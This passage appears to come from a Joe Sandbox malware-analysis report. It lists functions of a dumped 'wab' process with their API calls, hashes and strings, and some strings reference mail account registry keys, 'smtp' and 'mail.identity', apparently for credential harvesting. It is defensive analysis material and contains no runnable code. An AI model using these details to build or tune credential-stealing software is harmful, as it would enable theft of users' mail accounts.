                                          • API String ID: 1297977491-4203073231
                                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                          Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32(?), ref: 004090C2
                                          • GetWindowRect.USER32(?,?), ref: 004090CF
                                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ClientParentPoints
                                          • String ID:
                                          • API String ID: 4247780290-0
                                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                          Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                            • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                            • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                          • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                          • GetSysColor.USER32(00000005), ref: 004107A6
                                          • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                          • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                          • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                          • String ID:
                                          • API String ID: 2775283111-0
                                          • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                          • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                          • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                          • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                          Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: winSeekFile$winTruncate1$winTruncate2
                                          • API String ID: 885266447-2471937615
                                          • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                          • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                          • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                          • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                          Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _strcmpi$_mbscpy
                                          • String ID: smtp
                                          • API String ID: 2625860049-60245459
                                          • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                          • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                          Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                          • memset.MSVCRT ref: 00408258
                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                          Strings
                                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Close$EnumOpenmemset
                                          • String ID: Software\Google\Google Desktop\Mailboxes
                                          • API String ID: 2255314230-2212045309
                                          • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                          • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                          • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                          • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                          Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040C28C
                                          • SetFocus.USER32(?,?), ref: 0040C314
                                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FocusMessagePostmemset
                                          • String ID: S_@$l
                                          • API String ID: 3436799508-4018740455
                                          • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                          • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                          Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004092C0
                                          • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                          • _mbscpy.MSVCRT ref: 004092FC
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString_mbscpymemset
                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                          • API String ID: 408644273-3424043681
                                          • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                          • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                          • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                          • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                          Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID: C^@$X$ini
                                          • API String ID: 714388716-917056472
                                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                          • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                          Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                          • String ID: MS Sans Serif
                                          • API String ID: 3492281209-168460110
                                          • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                          • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                          Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ClassName_strcmpimemset
                                          • String ID: edit
                                          • API String ID: 275601554-2167791130
                                          • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                          • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                          Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: strlen$_mbscat
                                          • String ID: 3CD
                                          • API String ID: 3951308622-1938365332
                                          • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                          • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                          • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                          • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                          Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: rows deleted
                                          • API String ID: 2221118986-571615504
                                          • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                          • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                          • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                          • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                          Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$memset
                                          • String ID:
                                          • API String ID: 1860491036-0
                                          • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                          • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                          Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                          • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                          • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                          • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                          Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$memcpy
                                          • String ID:
                                          • API String ID: 368790112-0
                                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                          Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                          Download Yara Rule
                                          APIs
                                          • __allrem.LIBCMT ref: 00425850
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                          • __allrem.LIBCMT ref: 00425933
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                          • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                          • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                          • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                          Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                          • too many SQL variables, xrefs: 0042C6FD
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                          • API String ID: 2221118986-515162456
                                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                          Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                          • memset.MSVCRT ref: 004026AD
                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                            • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                          • LocalFree.KERNEL32(?), ref: 004027A6
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                          • String ID:
                                          • API String ID: 1593657333-0
                                          • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                          • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                          • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                          • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                          Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0040C922
                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Message$MenuPostSendStringmemset
                                          • String ID:
                                          • API String ID: 3798638045-0
                                          • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                          • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                          • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                          • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                          Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                          • strlen.MSVCRT ref: 0040B60B
                                          • atoi.MSVCRT ref: 0040B619
                                          • _mbsicmp.MSVCRT ref: 0040B66C
                                          • _mbsicmp.MSVCRT ref: 0040B67F
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                          • String ID:
                                          • API String ID: 4107816708-0
                                          • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                          • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                          Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                          • String ID:
                                          • API String ID: 1886415126-0
                                          • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                          • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                          • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                          • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                          Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: strlen
                                          • String ID: >$>$>
                                          • API String ID: 39653677-3911187716
                                          • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                          • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                          Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: @
                                          • API String ID: 3510742995-2766056989
                                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                          Function 0040796E Relevance: 6.1, APIs: 4, Instructions: 63stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strlen.MSVCRT ref: 0040797A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                            • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                            • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                            • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                          • memcpy.MSVCRT ref: 004079DD
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@$memcpy$mallocstrlen
                                          • String ID:
                                          • API String ID: 1171893557-0
                                          • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                          • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                          • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                          • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                          Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: C@$mail.identity
